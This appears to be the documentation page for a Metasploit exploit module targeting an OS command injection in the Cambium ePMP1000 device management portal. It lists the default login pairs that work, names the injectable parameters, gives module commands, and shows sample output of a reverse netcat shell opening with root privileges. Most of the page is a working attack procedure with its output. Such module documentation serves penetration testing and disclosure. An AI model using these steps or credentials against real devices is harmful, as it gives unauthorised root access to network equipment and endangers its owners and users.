Tod Beardsley
1.8 KiB
1.8 KiB
This module exploits an OS Command Injection vulnerability in Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.
This module injects the payload in 'packets_num' parameter. Alternatively, a second, vulnerable parameter 'ping_ip' can also be used.
Note: cmd/unix/reverse_netcat is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.
Verification Steps
- Do:
use exploit/unix/http/epmp1000_ping_cmd_shell - Do:
set RHOST [IP] - Do:
set RPORT [PORT] - Do:
set LHOST [IP] - Do:
exploit -j
Sample Output
msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j
[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700
msf exploit(epmp1000_ping_cmd_shell) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
10 shell cmd/unix 192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)
msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...
id
uid=0(root) gid=0(root)